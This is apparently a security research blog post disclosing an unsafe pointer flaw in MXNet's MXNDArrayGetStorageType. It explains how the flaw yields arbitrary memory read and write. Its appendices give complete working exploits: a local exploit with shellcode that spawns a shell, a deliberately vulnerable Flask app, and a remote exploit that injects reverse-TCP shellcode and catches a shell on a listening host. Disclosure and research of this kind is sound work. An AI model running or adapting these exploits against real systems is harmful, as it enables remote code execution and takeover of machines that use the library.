Hacking AI/ML: MXNet Unsafe Pointer Usage

Note from Protect AI

Security researcher Bryce Bearchell, in collaboration with Protect AI and huntr.mlsecops.com, discovered an interesting bug in MXNet, a popular library for creating machine learning models. Mishandling of memory in a core, commonly used function in MXNet leads to arbitrary code execution. In this guest blog post, Bryce explains how this issue can lead to remote code execution if MXNet ingests remote user input, such as through a web application.

What is MXNet?

Apache MXNet was designed as a flexible and efficient library for deep learning, with features like distributed training, 8 language bindings, a thriving ecosystem, and a hybrid front end. The current version of the project is 1.9.1, and it is available from public repositories and the PyPI ecosystem. The source code of the project can be obtained via GitHub:

git clone --recursive https://github.com/apache/mxnet

And the release version of the library for Python3 can be obtained via Pip:

pip3 install mxnet

Vulnerability

MXNet contains a vulnerability in a commonly used function that takes user input, which allows attackers to execute arbitrary code. This is particularly dangerous when MXNet is used in an API or web application, as remote user input leads directly to remote code execution and system takeover.

Discovering the Vulnerability

MXNet exposes a number of API functions to Python via `src/c_api/c_api.cc`, which are then wrapped in user-friendly functions in `python/mxnet/ndarray/ndarray.py`. A large number of these functions pass raw pointers to and from the application, rather than abstracting them and tracking them in the C++ code. This enables an attacker with access to the API to simply modify an object pointer (such as `NDArray.handle`), or call the library functions with malicious pointers, to cause memory corruption.

After some manual source code review, the function `MXNDArrayGetStorageType` in the C code was discovered to be vulnerable. The Python bindings can be found in `python/mxnet/ndarray/ndarray.py`:

def _storage_type(handle):
    storage_type = ctypes.c_int(0)
    check_call(_LIB.MXNDArrayGetStorageType(handle, ctypes.byref(storage_type)))
    return storage_type.value

The Bug

The Python bindings map directly to the MXNet Library API in `src/c_api/c_api.cc`. The `MXNDArrayGetStorageType` function contains the following code:

int MXNDArrayGetStorageType(NDArrayHandle handle, int *out_storage_type) { // [0]
  API_BEGIN();
  NDArray *arr = static_cast<NDArray*>(handle);
  if (!arr->is_none()) { // [1]
    *out_storage_type = arr->storage_type(); // [2]
  } else {
    *out_storage_type = kUndefinedStorage;
  }
  API_END();
}

There are three things to note in this function, matching the `[0]`, `[1]`, and `[2]` markers in the code:

[0] There is no validation of the handle; it is immediately cast to a pointer (`arr`) and used. The same is true of the `int *out_storage_type` pointer.
[1] The `is_none()` function is defined in `ndarray.h` as an inline function, which just checks the value at `[*arr + 0]` and compares it to zero. We can easily bypass this check by pointing the handle into a byte buffer we control and setting that value to non-zero.
[2] `storage_type()` is also defined in `ndarray.h` as an inline function; its assembly is just two instructions:

mov eax, DWORD PTR [rbx+0x50] ; rbx is handle

mov DWORD PTR [rbp+0x0], eax ; rbp is the address of out_storage_type

Item [2] is extremely powerful: it gives an attacker the ability not only to write anywhere in memory, but also to read any memory!
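
To make the control flow concrete, here is a minimal Python model of the function's logic that operates on a `bytes` buffer instead of real process memory. The helper name `get_storage_type_model`, the 8-byte width of the `is_none()` comparison, and the buffer layout are illustrative assumptions; only the `0x50` offset and the `kUndefinedStorage` fallback come from the code and disassembly shown here.

```python
import struct

K_UNDEFINED_STORAGE = -1    # kUndefinedStorage; shows up as 0xffffffff when read unsigned
STORAGE_TYPE_OFFSET = 0x50  # offset taken from the disassembly of storage_type()


def get_storage_type_model(memory: bytes, handle: int) -> int:
    """Model MXNDArrayGetStorageType over a buffer (hypothetical helper).

    `handle` is an index into `memory`, standing in for a raw pointer.
    """
    # is_none(): assumed here to be an 8-byte comparison against zero.
    (first_field,) = struct.unpack_from("<Q", memory, handle)
    if first_field == 0:
        return K_UNDEFINED_STORAGE
    # storage_type(): a plain 4-byte load at handle + 0x50, with no validation.
    (storage_type,) = struct.unpack_from("<i", memory, handle + STORAGE_TYPE_OFFSET)
    return storage_type


# A fake "object": non-zero first field, then a caller-chosen value at +0x50.
fake = b"A" * 8 + b"\0" * 0x48 + struct.pack("<i", 0x1234)
result_nonzero = get_storage_type_model(fake, 0)
result_none = get_storage_type_model(b"\0" * 0x60, 0)
```

In this model, whatever sits at `handle + 0x50` is returned to the caller as long as the first field is non-zero, which is the behavior the rest of this post relies on.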

Reading All Memory

By supplying a handle that points into a bytes buffer, we can bypass the check at [1] and control which memory address gets read back out at [2]. Note that this gives us almost full memory read access: in order to read memory address `XYZ`, we have to set `handle` to `XYZ - 0x50`, and the value stored at that location must be non-zero or the function will return `0xffffffff`. Another constraint, due to the data type of `out_storage_type`, is that each read returns only 4 bytes. That's OK, as we can just read twice to get a full 8-byte QWORD:

def r64(addr):

# this will fail if addr - 0x50 is null, but we can detect that and return False

storage_type1 = ctypes.c_uint64(0)

storage_type2 = ctypes.c_uint64(0)

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(addr-0x50), ctypes.byref(storage_type1))

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(addr-0x50+4), ctypes.byref(storage_type2))

if storage_type1.value == 0xffffffff or storage_type2.value == 0xffffffff:

return False

ret = (storage_type2.value << 32) | storage_type1.value

return ret

Writing All Memory

Because we control the address of `out_storage_type` at [2], we have the ability to write anywhere in memory, without the constraint that applies to reads! However, due to the data type of `out_storage_type`, we can only write 4 bytes at a time, but that's OK! We just write twice, offset by 4 bytes, to write a QWORD into memory:

def w64(addr, val):

# because we have a 4 byte write, we have to write twice to put a QWORD into memory

fake_object1 = b"A" * 0x10 + b"\0" * 0x40 + pack('<Q', val) + pack('<Q', val)

fake_object_addr1 = id(fake_object1) + sizeof(b"")-1

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(fake_object_addr1), ctypes.c_void_p(addr))

mx.base._LIB.MXNDArrayGetStorageType(ctypes.c_void_p(fake_object_addr1+4), ctypes.c_void_p(addr+4))
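
The arithmetic behind the two-step write can be checked in isolation. The sketch below simulates memory with a `bytearray` and shows that two little-endian 4-byte stores at `addr` and `addr + 4` produce the same bytes as one 8-byte store. The helper names are hypothetical and nothing here touches MXNet or real process memory.

```python
import struct


def write_dword(memory: bytearray, addr: int, value: int) -> None:
    """Store a 32-bit little-endian value (stand-in for one 4-byte write)."""
    struct.pack_into("<I", memory, addr, value & 0xFFFFFFFF)


def write_qword_as_two_dwords(memory: bytearray, addr: int, value: int) -> None:
    """Store a 64-bit value using two 4-byte writes."""
    write_dword(memory, addr, value)            # low half lands at addr
    write_dword(memory, addr + 4, value >> 32)  # high half lands at addr + 4


memory = bytearray(16)
write_qword_as_two_dwords(memory, 4, 0x4142434445464748)
stored = struct.unpack_from("<Q", memory, 4)[0]
```

Reading the eight bytes back as a single little-endian QWORD yields the original value, which is why the order of the two writes does not matter as long as each half goes to the right offset.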

RIP Control

Now that we have read and write primitives, we can easily get code execution by overwriting a built-in function in Python, and `id()` (address of object) is a great target for this:

# Get the address of id, and then using some reverse engineering of Python object

# formats in memory, we know that the actual function pointer is at offset 0x30

id_addr = id(id)+0x30

# overwrite the id() function pointer!

w64(id_addr, 0x4142434445464748)

And once that has been overwritten, we can cause `RIP` to jump to that address by calling `id()` on an object:

id(1) # this will cause a crash with RIP=0x4142434445464748

Local Exploit Development

Because we can read and write memory, ASLR (Address Space Layout Randomization) is trivially defeated by calling Python built-in functions like `id()`. That enables us to learn where all the executables and libraries are in memory, although our code execution primitive only gives us control over the following:

- `RIP`

- `[RSI]+0x18` (object parameter passed as argument to `id()`)

- `[RSP-0x48]+0x20` (object parameter passed as argument to `id()`)

At this point, we could construct a ROP (Return Oriented Programming) chain, but that would require version-specific gadgets for every version of Python, LibC, and LibFFI. Great for a single target, but we can do better!

Upon inspection of the memory mapped regions, there is a very interesting memory region referenced by `/usr/lib/x86_64-linux-gnu/libffi.so.8.1.0`:

vmmap

...

0x00007ffff7ffa000 0x00007ffff7ffb000 0x0000000000000000 rwx

This page will allow us to write shellcode into it (the `w` permission), as well as run code within it (the `x` permission)! For ease & portability, we will read the map from `/proc/self/maps`, however, it is completely possible to obtain a reference to this memory space in a non-portable way (offsets from each library would need to be computed per Python, FFI, and LibC version):

addr = 0
for line in open('/proc/self/maps','r').read().split('\n'):
    if 'rwx' in line:
        addr = int('0x' + line.split('-')[0], 0x10)
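
The same lookup can be written to parse the permission field explicitly rather than matching the substring `rwx` anywhere in the line. The sketch below runs against a small sample string so that it is self-contained; the helper name `find_wx_regions` and the sample addresses are illustrative only. The same check is useful defensively, for auditing a process for mappings that are both writable and executable.

```python
from typing import List, Tuple

# Sample text in the /proc/<pid>/maps format; addresses are made up.
SAMPLE_MAPS = """\
7ffff7fc1000-7ffff7fc3000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffa000-7ffff7ffb000 rwxp 00000000 00:00 0
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
"""


def find_wx_regions(maps_text: str) -> List[Tuple[int, int]]:
    """Return (start, end) for every mapping that is writable and executable."""
    regions = []
    for line in maps_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue  # skip blank or malformed lines
        address_range, perms = fields[0], fields[1]
        if "w" in perms and "x" in perms:
            start, end = (int(part, 16) for part in address_range.split("-"))
            regions.append((start, end))
    return regions


regions = find_wx_regions(SAMPLE_MAPS)
```

On a live Linux system the input would come from reading `/proc/self/maps` instead of the sample string.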

We can write our shellcode into that address, and use our RIP control primitive to jump to our shellcode:

user@mxnetdev:~/exploit$ python3 MXNetUnsafePointerExploit.py

******** MXNet Unsafe Pointer Usage Exploit ********

[+] derived RWX_ADDR: 0x7f9ebf94e000

[+] set RWX_ADDR += 0x800 (halfway through page): 0x7f9ebf94e800

[+] Writing shellcode to 0x7f9ebf94e800

[w] w64(0x7f9ebf94e800, 0x120d8d4cec8b48)

[w] w64(0x7f9ebf94e808, 0x58016a318d490000)

[w] w64(0x7f9ebf94e810, 0xe9050f5a146aff33)

[w] w64(0x7f9ebf94e818, 0x6c70784500000015)

[w] w64(0x7f9ebf94e820, 0x636375532074696f)

[w] w64(0x7f9ebf94e828, 0xa216c7566737365)

[w] w64(0x7f9ebf94e830, 0xc031489090909000)

[w] w64(0x7f9ebf94e838, 0x622f2fbb48d23148)

[w] w64(0x7f9ebf94e840, 0xebc14868732f6e69)

[w] w64(0x7f9ebf94e848, 0x485750e789485308)

[w] w64(0x7f9ebf94e850, 0x50f3bb0e689)

[+] Shellcode written!

[+] Deriving address of Python3 builting function id...

[+] Overwriting id() function pointer with address to shellcode...

[w] w64(0x7f9ebf250d40, 0x7f9ebf94e800)

[+] Triggering the exploit!

Exploit Successful!

$ id

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)

$ whoami

user

$ exit

user@mxnetdev:~/exploit$

The source code for this exploit is included in Appendix A.

Remote Exploitation Against a Vulnerable Application

To demonstrate the impact of the vulnerability, we will exploit a custom vulnerable application, cause it to run our shellcode, and gain access to the remote system through an interactive reverse shell.

A simple vulnerable Python Flask application was made for this purpose. The source code for this application is included in Appendix B.

Converting the local exploit to a remote one only requires ensuring that the following are executed server-side:

- `MXNDArrayGetStorageType`

- `id`

Because the vulnerable application interacts over HTTP and responds in JSON, we can convert those local calls to remote ones by using Python `requests`:

Local (old)

mx.base._LIB.MXNDArrayGetStorageType(

ctypes.c_void_p(fake_object_addr1),

ctypes.c_void_p(addr))

Remote (new)

def MXNDArrayGetStorageType(handle, storage_type=-1):

'''

Exercise the vulnerable code path in src/c_api/c_api.cc

int MXNDArrayGetStorageType(NDArrayHandle handle,

int *out_storage_type) {

API_BEGIN();

NDArray *arr = static_cast<NDArray*>(handle);

if (!arr->is_none()) {

*out_storage_type = arr->storage_type();

} else {

*out_storage_type = kUndefinedStorage;

}

API_END();

}

'''

global URL

path = '/get_storage_type'

params = {}

params['handle'] = handle

if storage_type != -1:

params['storage_type'] = storage_type

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

Local (old)

id(1)

Remote (new)

def _id(id=0, objtype='int'):

'''

Plant a bytestring into memory and obtain its address. Not strictly

required (r64 & w64 are the only required functions), however it

greatly simplifies exploitation for demonstration.

'''

global URL

path = '/id'

params = {}

if objtype != 'int':

id = base64.b64encode(id)

params['id'] = id

params['objtype'] = objtype

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

And with some modification of the shellcode, we can simply re-run the exploit and it now works remotely:

$ python3 x.py http://192.168.200.185:5000 192.168.200.186 1337

******** MXNet Unsafe Pointer Usage Exploit ********

[i] got id 0x7fde61190d10

[+] derived RWX_ADDR: 0x7ffe3d3ae000

[+] set RWX_ADDR += 0x800 (halfway through page): 0x7ffe3d3ae800

[+] Writing shellcode to 0x7ffe3d3ae800

[w] w64(0x7ffe3d3ae800, 0x3148ff3148c03148)

[w] w64(0x7ffe3d3ae808, 0x6ac0314dd23148f6)

[w] w64(0x7ffe3d3ae810, 0x5a066a5e016a5f02)

[w] w64(0x7ffe3d3ae818, 0xc08949050f58296a)

[w] w64(0x7ffe3d3ae820, 0x5241d2314df63148)

[w] w64(0x7ffe3d3ae828, 0x2444c766022404c6)

[w] w64(0x7ffe3d3ae830, 0xc0042444c7390502)

[w] w64(0x7ffe3d3ae838, 0x106ae68948bac8a8)

[w] w64(0x7ffe3d3ae840, 0xf582a6a5f50415a)

[w] w64(0x7ffe3d3ae848, 0x485e036af6314805)

[w] w64(0x7ffe3d3ae850, 0x75050f58216aceff)

[w] w64(0x7ffe3d3ae858, 0x5a5e5757ff3148f6)

[w] w64(0x7ffe3d3ae860, 0x2f6e69622f2fbf48)

[w] w64(0x7ffe3d3ae868, 0x545708efc1486873)

[w] w64(0x7ffe3d3ae870, 0x50f583b6a5f)

[+] Shellcode written!

[+] Deriving address of Python3 builting function id...

[+] Overwriting id() function pointer with address to shellcode...

[w] w64(0x7fde61190d40, 0x7ffe3d3ae800)

[^] Setting up listening shell...

[+] Trying to bind to 192.168.200.186 on port 1337: Done

[+] Waiting for connections on 192.168.200.186:1337: Got connection from 192.168.200.185 on port 57048

[+] Triggering the exploit!

[------------------------------------------------------------]

[+] Received a shell!!!

[------------------------------------------------------------]

[*] Switching to interactive mode

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)

user

/home/user

$ id

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),999(docker)

The source code for this exploit is included in Appendix C.

Recommendations

The fundamental cause of this vulnerability is that MXNet requires its API consumers to manage MXNet's internal state (the `handle` property on many objects). To avoid this, MXNet should manage its own state. This can be done by introducing an internal table within MXNet that maps tokens to object references; users of the API then refer to the token when calling library functions, allowing MXNet to retain control over its memory-critical operations.
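
As a rough illustration of that recommendation, the following Python sketch shows one way a token table could look. It is not MXNet code: the `HandleTable` class, its method names, and the choice of random 63-bit tokens are all assumptions made for the example. The point is only that a caller-supplied value is looked up in a table the library owns and is rejected if unknown, instead of being cast to a pointer.

```python
import secrets
from typing import Any, Dict


class HandleTable:
    """Maps opaque tokens to objects so callers never hold raw pointers."""

    def __init__(self) -> None:
        self._objects: Dict[int, Any] = {}

    def register(self, obj: Any) -> int:
        """Store `obj` and return a fresh, non-zero, hard-to-guess token."""
        token = secrets.randbits(63) | 1
        while token in self._objects:
            token = secrets.randbits(63) | 1
        self._objects[token] = obj
        return token

    def resolve(self, token: int) -> Any:
        """Return the object for `token`, or raise if it was never issued."""
        try:
            return self._objects[token]
        except KeyError:
            raise ValueError(f"unknown handle: {token!r}") from None

    def release(self, token: int) -> None:
        """Forget a token; later lookups with it will fail."""
        self._objects.pop(token, None)


table = HandleTable()
token = table.register({"storage_type": 1})
resolved = table.resolve(token)
```

With this shape, an API function would call `resolve()` first and return an error for any value that was not issued by `register()`, so an arbitrary integer can no longer be interpreted as an object address.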

Appendix A - Local Exploit (Tested on Python 3.10.6 & MXNet 1.9.1)

#!/usr/bin/env python3

'''

MXNet Unsafe Pointer Usage Exploit

Payload:

write(1, "Exploit Successful!\n", 0x14);

execve("/bin/sh", ["/bin/sh"], NULL)

'''

import ctypes

from struct import pack, unpack

import mxnet as mx

def sizeof(obj):

'''

Determine the size of a Python object in memory

Source: https://github.com/DavidBuchanan314/unsafe-python

'''

return type(obj).__sizeof__(obj)

def w64(addr, val):

'''

Write 64 bits to an address in memory. Note that because we have a

4 byte write, we have to write twice to put a QWORD into memory.

'''

print(f'[w]\t\tw64({hex(addr)}, {hex(val)})')

fake_object1 = b'A' * 0x10 + b'\0' * 0x40 + pack('<Q', val) + pack('<Q', val)

fake_object_addr1 = id(fake_object1) + sizeof(b'')-1

mx.base._LIB.MXNDArrayGetStorageType(

ctypes.c_void_p(fake_object_addr1),

ctypes.c_void_p(addr))

mx.base._LIB.MXNDArrayGetStorageType(

ctypes.c_void_p(fake_object_addr1+4),

ctypes.c_void_p(addr+4))

if __name__ == '__main__':

print(f'{"*"*8} MXNet Unsafe Pointer Usage Exploit {"*"*8}')

RWX_ADDR = 0

with open('/proc/self/maps','r', encoding="utf-8") as fd:

for line in fd.read().split('\n'):

if 'rwx' in line:

RWX_ADDR = int('0x' + line.split('-')[0], 0x10)

print(f'[+]\tderived RWX_ADDR: {hex(RWX_ADDR)}')

RWX_ADDR += 0x800

print(f'[+]\tset RWX_ADDR += 0x800 (halfway through page): {hex(RWX_ADDR)}')

# shellcode obtained from Binary Ninja's Shellcode Compiler

# scc x86_64 / linux

# void main() {

# write(1, "Exploit Successful!\n", 0x14);

# interactive_sh();

# }

SHELLCODE = b'\x48\x8b\xec\x4c\x8d\x0d\x12\x00\x00\x00\x49\x8d\x31\x6a\x01\x58' +\

b'\x33\xff\x6a\x14\x5a\x0f\x05\xe9\x15\x00\x00\x00\x45\x78\x70\x6c' +\

b'\x6f\x69\x74\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x21\x0a' +\

b'\x00\x90\x90\x90\x90\x48\x31\xc0\x48\x31\xd2\x48\xbb\x2f\x2f\x62' +\

b'\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48' +\

b'\x89\xe6\xb0\x3b\x0f\x05'

SHELLCODE += b'\x00' * ((8-len(SHELLCODE) % 8)) # pad to 8 bytes

print(f'[+]\tWriting shellcode to {hex(RWX_ADDR)}')

for i in range(0, len(SHELLCODE), 8):

v = unpack('<Q', SHELLCODE[i:i+8])[0]

sc_addr = RWX_ADDR+i

w64(sc_addr, v)

print('[+]\tShellcode written!')

print('[+]\tDeriving address of Python3 builting function id...')

id_addr = id(id)+0x30

print('[+]\tOverwriting id() function pointer with address to shellcode...')

w64(id_addr, RWX_ADDR)

print('[+]\tTriggering the exploit!')

id(1)

Shellcode Payload

00000000 488bec mov rbp, rsp {__return_addr}

00000003 4c8d0d12000000 lea r9, [rel data_1c] {"Exploit Successful!\n"}

0000000a 498d31 lea rsi, [r9] {data_1c, "Exploit Successful!\n"}

0000000d 6a01 push data_0+1 {var_8}

0000000f 58 pop rax {var_8} {data_0+1}

00000010 33ff xor edi, edi {sub_0}

00000012 6a14 push data_14 {var_8}

00000014 5a pop rdx {var_8} {data_14}

00000015 0f05 syscall ; write(1, "Exploit Successful!\n", 0x14)

00000017 e915000000 jmp sub_31

0000001c char data_1c[0x15] = "Exploit Successful!\n", 0

00000031 90 nop

00000032 90 nop

00000033 90 nop

00000034 90 nop

00000035 4831c0 xor rax, rax {sub_0}

00000038 4831d2 xor rdx, rdx {sub_0}

0000003b 48bb2f2f62696e2f…mov rbx, 0x68732f6e69622f2f

00000045 48c1eb08 shr rbx, 0x8 {0x68732f6e69622f}

00000049 53 push rbx {var_8} {0x68732f6e69622f}

0000004a 4889e7 mov rdi, rsp {var_8}

0000004d 50 push rax {var_10} {sub_0}

0000004e 57 push rdi {var_8} {var_18}

0000004f 4889e6 mov rsi, rsp {var_18}

00000052 b03b mov al, 0x3b

00000054 0f05 syscall ; execve("/bin/sh", ["/bin/sh"], NULL)

Appendix B - Vulnerable Application (Tested on Python 3.10.6 & MXNet 1.9.1)

This app requires `Flask` and was tested against version `2.3.2`. See Appendix D for a full `requirements.txt`. After saving the Python code as `app.py`, it can be run like so:

$ flask run --host=0.0.0.0

App.py

import os, ctypes

from flask import Flask, request, jsonify

from urllib.parse import urlparse

import base64

app = Flask(__name__)

BASE = os.path.expanduser('~') + '/.local/lib/python3.10/site-packages/mxnet/'

mxnet = ctypes.CDLL(BASE + 'libmxnet.so')

PID = os.getpid()

fd = open('/proc/self/maps','r', encoding="utf-8")

MAPS = fd.read()

fd.close()

traffic = []

@app.route('/get_storage_type', methods=['GET'])

def get_storage_type():

handle = int(request.args.get('handle'))

out_storage_type = 0

out = None

if request.args.get('storage_type'):

out_storage_type = int(request.args.get('storage_type'))

out = out_storage_type

mxnet.MXNDArrayGetStorageType(ctypes.c_void_p(handle), ctypes.c_void_p(out))

else:

out = ctypes.byref(out_storage_type)

mxnet.MXNDArrayGetStorageType(ctypes.c_void_p(handle), out)

response = {'result': out_storage_type}

return jsonify(response)

@app.route('/id', methods=['GET'])

def client_id():

global traffic

objtype = request.args.get('objtype')

client_id = None

if objtype == 'int':

client_id = int(request.args.get('id'))

else:

data = request.args.get('id')

client_id = base64.b64decode(data)

traffic.append(client_id)

response = {'result': str(id(traffic[len(traffic)-1]))}

return jsonify(response)

@app.route('/rwx', methods=['GET'])

def rwx():

rwx_addr = 0

with open('/proc/self/maps','r', encoding="utf-8") as fd:

for line in fd.read().split('\n'):

if 'rwx' in line:

rwx_addr = int('0x' + line.split('-')[0], 0x10)

response = {'result': str(rwx_addr)}

return jsonify(response)

@app.route('/', methods=['GET'])

def index():

global PID, MAPS

return f'''

<html>

<head><title>Example Vulnerable Application</title></head>

<body>

<h1>Example Vulnerable Application</h1>

<pre>

id: {id(id)}

pid: {PID}

Minimum functionality required to demonstrate exploit:

/get_storage_type

&lthandle: int&gt

[storage_type: int]

returns result (int)

E.G: /get_storage_type?handle=0&storage_type=0

/id

&ltid: str&gt

&ltobjtype: str&lt'int', 'base64'&gt&gt

returns result (int)

E.G: <a href='/id?id=0&objtype=int'>/id?id=0&objtype=int</a>

Optional:

/rwx

returns result (int)

E.G: <a href='/rwx'>/rwx</a>

</pre>

</body>

</html>

'''

if __name__ == '__main__':

app.run(debug=False)

Appendix C - Remote Exploit (Tested on Python 3.10.6 & MXNet 1.9.1)

This exploit uses pwntools, and it can be obtained here: https://github.com/Gallopsled/pwntools. See Appendix D for a full `requirements.txt`.

#!/usr/bin/env python3

'''

MXNet Unsafe Pointer Usage Exploit

Payload:

Reverse TCP shell

'''

import ctypes

import mxnet as mx

import requests, json, base64

from pwn import *

from struct import pack, unpack

from time import sleep

from threading import Thread

from sys import argv

URL = 'http://127.0.0.1:5000'

PORT = 1337

BIND_ADDRESS = '127.0.0.1'

REVERSE_SHELL_IP = 0

def MXNDArrayGetStorageType(handle, storage_type=-1):

'''

Exercise the vulnerable code path in src/c_api/c_api.cc

int MXNDArrayGetStorageType(NDArrayHandle handle,

int *out_storage_type) {

API_BEGIN();

NDArray *arr = static_cast<NDArray*>(handle);

if (!arr->is_none()) {

*out_storage_type = arr->storage_type();

} else {

*out_storage_type = kUndefinedStorage;

}

API_END();

}

'''

global URL

path = '/get_storage_type'

params = {}

params['handle'] = handle

if storage_type != -1:

params['storage_type'] = storage_type

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

def _id(id=0, objtype='int'):

'''

Plant a bytestring into memory and obtain its address. Not strictly

required (r64 & w64 are the only required functions), however it

greatly simplifies exploitation for demonstration.

'''

global URL

path = '/id'

params = {}

if objtype != 'int':

id = base64.b64encode(id)

params['id'] = id

params['objtype'] = objtype

response = requests.get(URL+path, params=params)

ret = int(json.loads(response.text)['result'])

return ret

def rwx():

'''

Obtain the location of the RWX page. This is optional, however

introspection using reads will require per-version of python &

ctypes, making this less portable for demonstration.

'''

global URL

path = '/rwx'

response = requests.get(URL+path)

ret = int(json.loads(response.text)['result'])

return ret

def get_id_reference():

'''

To use id as a trigger, we need to know where it lies in memory.

'''

global URL

path = '/'

response = requests.get(URL+path)

ret = 0

for line in response.text.split('\n'):

if 'id' in line:

ret = int(line.split(': ')[1])

break

print('[i]\tgot id', hex(ret))

return ret

def sizeof(obj):

'''

Determine the size of a Python object in memory.

Source: https://github.com/DavidBuchanan314/unsafe-python

'''

return type(obj).__sizeof__(obj)

def r64(addr):

'''

Read arbitrary memory with a constraint that addr - 0x50 must be

non-null. We detect when this condition occurs, and fail properly.

'''

storage_type1 = MXNDArrayGetStorageType(addr-0x50)

storage_type2 = MXNDArrayGetStorageType(addr-0x50+4)

if storage_type1.value == 0xffffffff or storage_type2.value == 0xffffffff:

return False

ret = (storage_type2.value << 32) | storage_type1.value

return ret

def w64(addr, val):

'''

Write 64 bits to an address in memory. Note that because we have a

4 byte write, we have to write twice to put a QWORD into memory.

'''

print(f'[w]\t\tw64({hex(addr)}, {hex(val)})')

fake_object_addr1 = _id(

b'A' * 0x10 + b'\0' * 0x40 + pack('<Q', val) + pack('<Q', val),

objtype='base64') + sizeof(b'')-1

MXNDArrayGetStorageType(

fake_object_addr1,

addr

)

MXNDArrayGetStorageType(

fake_object_addr1 + 4,

addr + 4

)

def trigger(_):

sleep(1)

print('[+]\tTriggering the exploit!')

try:

_id(1)

except:

pass

if __name__ == '__main__':

if len(argv) != 4:

print('Usage:\n\tunsafe_pointer_exploit.py <target URL> <rev_shell_ip> <port>')

exit(1)

URL = argv[1]

BIND_ADDRESS = argv[2]

PORT = int(argv[3])

REVERSE_SHELL_IP = int(BIND_ADDRESS.split('.')[0]) << 24

REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[1]) << 16

REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[2]) << 8

REVERSE_SHELL_IP |= int(BIND_ADDRESS.split('.')[3])

print(f'{"*"*8} MXNet Unsafe Pointer Usage Exploit {"*"*8}')

id_ref = get_id_reference()

RWX_ADDR = rwx()

print(f'[+]\tderived RWX_ADDR: {hex(RWX_ADDR)}')

RWX_ADDR += 0x800

print(f'[+]\tset RWX_ADDR += 0x800 (halfway through page): {hex(RWX_ADDR)}')

# This shellcode was obtained from

# https://shell-storm.org/shellcode/files/shellcode-857.html

SHELLCODE = b'\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a' +\

b'\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0' +\

b'\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24' +\

b'\x02'+ pack('>H', PORT) +b'\xc7\x44\x24\x04' +\

pack('>I', REVERSE_SHELL_IP)+ b'\x48\x89\xe6\x6a\x10' +\

b'\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48' +\

b'\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a' +\

b'\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54' +\

b'\x5f\x6a\x3b\x58\x0f\x05'

SHELLCODE += b'\x00' * ((8-len(SHELLCODE) % 8)) # pad to 8 bytes

print(f'[+]\tWriting shellcode to {hex(RWX_ADDR)}')

for i in range(0, len(SHELLCODE), 8):

v = unpack('<Q', SHELLCODE[i:i+8])[0]

sc_addr = RWX_ADDR+i

w64(sc_addr, v)

print('[+]\tShellcode written!')

print('[+]\tDeriving address of Python3 builting function id...')

id_addr = id_ref+0x30

print('[+]\tOverwriting id() function pointer with address to shellcode...')

w64(id_addr, RWX_ADDR)

print('[^]\tSetting up listening shell...')

l = listen(port=PORT, bindaddr=BIND_ADDRESS) # pwntools listen

t = Thread(target=trigger, args=(0,))

t.start()

c = l.wait_for_connection()

print('['+'-'*60+']')

print('[+]\tReceived a shell!!!')

print('['+'-'*60+']')

c.send(b'id;whoami;pwd;\n\n\n\n')

c.interactive()

Shellcode Payload

This shellcode was obtained from https://shell-storm.org/shellcode/files/shellcode-857.html

0000000000400080 <_start>:

400080: 48 31 c0 xor rax,rax

400083: 48 31 ff xor rdi,rdi

400086: 48 31 f6 xor rsi,rsi

400089: 48 31 d2 xor rdx,rdx

40008c: 4d 31 c0 xor r8,r8

40008f: 6a 02 push 0x2

400091: 5f pop rdi

400092: 6a 01 push 0x1

400094: 5e pop rsi

400095: 6a 06 push 0x6

400097: 5a pop rdx

400098: 6a 29 push 0x29

40009a: 58 pop rax

40009b: 0f 05 syscall

40009d: 49 89 c0 mov r8,rax

4000a0: 48 31 f6 xor rsi,rsi

4000a3: 4d 31 d2 xor r10,r10

4000a6: 41 52 push r10

4000a8: c6 04 24 02 mov BYTE PTR [rsp],0x2

4000ac: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a

4000b3: c7 44 24 04 0a 33 35 mov DWORD PTR [rsp+0x4],0x435330a

4000ba: 04

4000bb: 48 89 e6 mov rsi,rsp

4000be: 6a 10 push 0x10

4000c0: 5a pop rdx

4000c1: 41 50 push r8

4000c3: 5f pop rdi

4000c4: 6a 2a push 0x2a

4000c6: 58 pop rax

4000c7: 0f 05 syscall

4000c9: 48 31 f6 xor rsi,rsi

4000cc: 6a 03 push 0x3

4000ce: 5e pop rsi

00000000004000cf <loop>:

4000cf: 48 ff ce dec rsi

4000d2: 6a 21 push 0x21

4000d4: 58 pop rax

4000d5: 0f 05 syscall

4000d7: 75 f6 jne 4000cf <loop>

4000d9: 48 31 ff xor rdi,rdi

4000dc: 57 push rdi

4000dd: 57 push rdi

4000de: 5e pop rsi

4000df: 5a pop rdx

4000e0: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f

4000e7: 2f 73 68

4000ea: 48 c1 ef 08 shr rdi,0x8

